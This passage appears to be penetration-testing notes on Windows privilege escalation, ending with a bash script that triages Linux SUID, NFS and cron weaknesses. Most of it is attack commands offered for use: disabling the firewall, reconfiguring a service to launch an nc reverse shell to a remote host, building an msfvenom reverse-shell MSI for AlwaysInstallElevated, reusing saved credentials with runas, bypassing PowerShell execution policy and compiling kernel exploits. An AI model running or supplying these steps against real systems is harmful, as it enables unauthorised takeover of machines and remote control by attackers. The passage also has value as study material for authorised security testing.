netsh advfirewall firewall show rule name=all
netsh firewall show state         (show whether the firewall is running or stopped)
netsh firewall show config        (show firewall configuration)
netsh firewall set opmode disable # disable firewall

Scheduled Tasks
schtasks /query /fo LIST /v

Mount Information
mountvol

Escalation Techniques:

Service Account Priv Esc (Token Impersonation)
whoami /priv      (look for SeImpersonatePrivilege or SeAssignPrimaryTokenPrivilege, which service accounts commonly hold)

Run As :
Use cmdkey to list the stored credentials on the machine:
cmdkey /list
Currently stored credentials:
    Target: Domain:interactive=WORKGROUP\Administrator
    Type: Domain Password
    User: WORKGROUP\Administrator
Using runas with a saved set of credentials (the /user value must match the user of the stored credential):
runas /savecred /user:admin C:\PrivEsc\reverse.exe
C:\Windows\System32\runas.exe /env /noprofile /user: "c

Access check :
accesschk.exe -ucqv [service_name] /accepteula
accesschk.exe -uwcqv "Authenticated Users" *     (won't yield anything on Win 8)
Find all weak folder permissions per drive:
accesschk.exe /accepteula -uwdqs Users c:\
accesschk.exe /accepteula -uwdqs "Authenticated Users" c:\
Find all weak file permissions per drive:
accesschk.exe /accepteula -uwsv "Everyone" "C:\Program Files"
accesschk.exe /accepteula -uwqs Users c:\*.*
accesschk.exe /accepteula -uwqs "Authenticated Users" c:\*.*
Powershell :
Get-ChildItem "C:\Program Files" -Recurse | Get-ACL | ?{$_.AccessToString -match "Everyone\sAllow\s\sModify"}

Binary planting (https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#services)
sc qc [service_name]        // service properties (binary path, start type, account)
sc query [service_name]     // service status
sc config [service_name] binpath= "C:\Temp\nc.exe -nv [RHOST] [RPORT] -e C:\WINDOWS\System32\cmd.exe"
sc config [service_name] obj= ".\LocalSystem" password= ""
net start [service_name]

Unquoted Service Path Privilege Escalation
https://pentest.blog/windows-privilege-escalation-methods-for-pentesters/
wmic service get name,displayname,pathname,startmode | findstr /i "Auto"
(look for auto-start paths containing spaces that are not wrapped in quotes)

Always Install Elevated :
reg query HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Installer
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer
(AlwaysInstallElevated must be set to 1 in both keys)
msfvenom -p windows/shell_reverse_tcp LHOST=10.x.x.x LPORT=4444 -f msi > install.msi
C:\> msiexec /quiet /qn /i install.msi

Kernel Exploits :
https://github.com/abatchy17/WindowsExploits
https://github.com/SecWiki/windows-kernel-exploits
run systeminfo, capture the output and run windows-exploit-suggester.py against it
Compiling Kernel Exploits :
i686-w64-mingw32-gcc exploit.c -o exploit             # 32-bit target (use x86_64-w64-mingw32-gcc for 64-bit)
i686-w64-mingw32-gcc 40564.c -o 40564 -lws2_32        # link winsock when the exploit needs it

Automated Enumeration Tools
Powershell:
powershell -ep bypass
load powershell   (only in meterpreter)
Sherlock (https://github.com/rasta-mouse/Sherlock)
PowerUp (https://github.com/PowerShellMafia/PowerSploit/tree/master/Privesc)
EXE : (https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#exe)
WinPeas [https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/winPEAS]
Accesschk.exe [https://github.com/jivoi/pentest/blob/master/post_win/accesschk_exe]
Seatbelt (https://github.com/carlospolop/winPE/tree/master/binaries/seatbelt)
Other :
Windows Exploit Suggester (https://github.com/AonCyberLabs/Windows-Exploit-Suggester)
Metasploit :
getsystem
run post/multi/recon/local_exploit_suggester

Resources :
https://sushant747.gitbooks.io/total-oscp-guide/privilege_escalation_windows.html
https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Windows%20-%20Privilege%20Escalation.md
https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/
http://www.fuzzysecurity.com/tutorials/16.html
https://book.hacktricks.xyz/windows/checklist-windows-privilege-escalation (Win PrivEsc Checklist)
https://pentest.blog/windows-privilege-escalation-methods-for-pentesters/

Enumeration Tools :
https://github.com/Tib3rius/AutoRecon
https://bitbucket.org/xaeroborg/python3-programs/src
https://github.com/21y4d/nmapAutomator
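Returning to the Linux part of this page: the SUID Shared Object Injection steps, the NFS Misconfiguration notes and the Cron tabs / Path Hijacking items of the checklist are each a read-and-check over text that can be captured once (strace output, /etc/exports, a crontab). The script below is an added example, not code from the original notes: it implements those three checks as functions that run over such captured files, so the triage can be repeated offline. The binary names, export lines and crontab entries used in its comments are constructed.

```shell
#!/usr/bin/env bash
# linux_triage.sh: added example (not from the original notes) for three of the
# Linux checks above, written over captured text so they can be exercised offline:
#   1. the strace output of a SUID binary  -> SUID shared object injection candidates
#   2. /etc/exports                        -> NFS exports with no_root_squash
#   3. a system crontab                    -> jobs whose script, or PATH lookup, we control
# Usage: . ./linux_triage.sh; missing_writable_so <(strace /usr/local/bin/fishybinary 2>&1)
# Sample paths in the comments are constructed.

# 1. Shared objects the traced binary tried to open and did not find (ENOENT), kept
#    only when their directory is writable by us. That is the only usable case: the
#    loader ignores LD_PRELOAD/LD_LIBRARY_PATH for setuid binaries, so the lookup must
#    already point at a directory we own (RPATH/RUNPATH or an absolute dlopen path).
missing_writable_so() {                  # $1 = file holding `strace <binary> 2>&1`
    grep -E '^(open|openat|access|stat)\(.*\.so[.0-9]*".*ENOENT' "$1" \
      | grep -oE '"[^"]+\.so[.0-9]*"' | tr -d '"' | sort -u \
      | while IFS= read -r so; do
            if [ -d "$(dirname "$so")" ] && [ -w "$(dirname "$so")" ]; then
                printf '%s\n' "$so"
            fi
        done
}

# 2. Export paths that keep the client's uid 0 (no_root_squash). On such a share a
#    file created by root on Kali and given chmod +xs stays root-owned on the target,
#    which is what the shell.elf step in the NFS notes relies on.
nfs_no_root_squash() {                   # $1 = exports file, normally /etc/exports
    grep -vE '^[[:space:]]*(#|$)' "$1" | awk '/no_root_squash/ { print $1 }'
}

# First directory of a colon-separated PATH-style list that we can write to.
first_writable_dir() {                   # $1 = "dir1:dir2:..."
    printf '%s\n' "$1" | tr ':' '\n' | while IFS= read -r d; do
        if [ -n "$d" ] && [ -w "$d" ]; then printf '%s\n' "$d"; break; fi
    done
}

# 3. System crontab jobs (5 time fields or @reboot, then user, then command) that are
#    WRITABLE   - the job runs an absolute path we can modify, or
#    HIJACKABLE - the command is a bare name resolved through a PATH that contains a
#                 directory we can write to (Path Hijacking in the checklist).
cron_weak_jobs() {                       # $1 = crontab file, e.g. /etc/crontab or /etc/cron.d/job
    local path hit
    path=$(sed -nE 's/^[[:space:]]*PATH=//p' "$1" | tail -n 1)
    path=${path:-/usr/bin:/bin}          # cron's default when the file sets no PATH
    grep -vE '^[[:space:]]*(#|$|[A-Za-z_]+=)' "$1" \
      | while read -r f1 f2 f3 f4 f5 f6 f7 _; do
            case "$f1" in
                @*) user=$f2; cmd=$f3 ;;     # @reboot/@daily form has no time fields
                *)  user=$f6; cmd=$f7 ;;
            esac
            case "$cmd" in
                /*) if [ -w "$cmd" ]; then
                        printf 'WRITABLE %s (runs as %s)\n' "$cmd" "$user"
                    fi ;;
                *)  hit=$(first_writable_dir "$path")
                    if [ -n "$hit" ]; then
                        printf 'HIJACKABLE %s: drop %s/%s (runs as %s)\n' "$cmd" "$hit" "$cmd" "$user"
                    fi ;;
            esac
        done
}
```

For cron jobs that do not appear in any file you can read (user crontabs, or jobs started from a script), pspy from the tools list is still the way to see them; the function above only covers what the crontab text itself exposes.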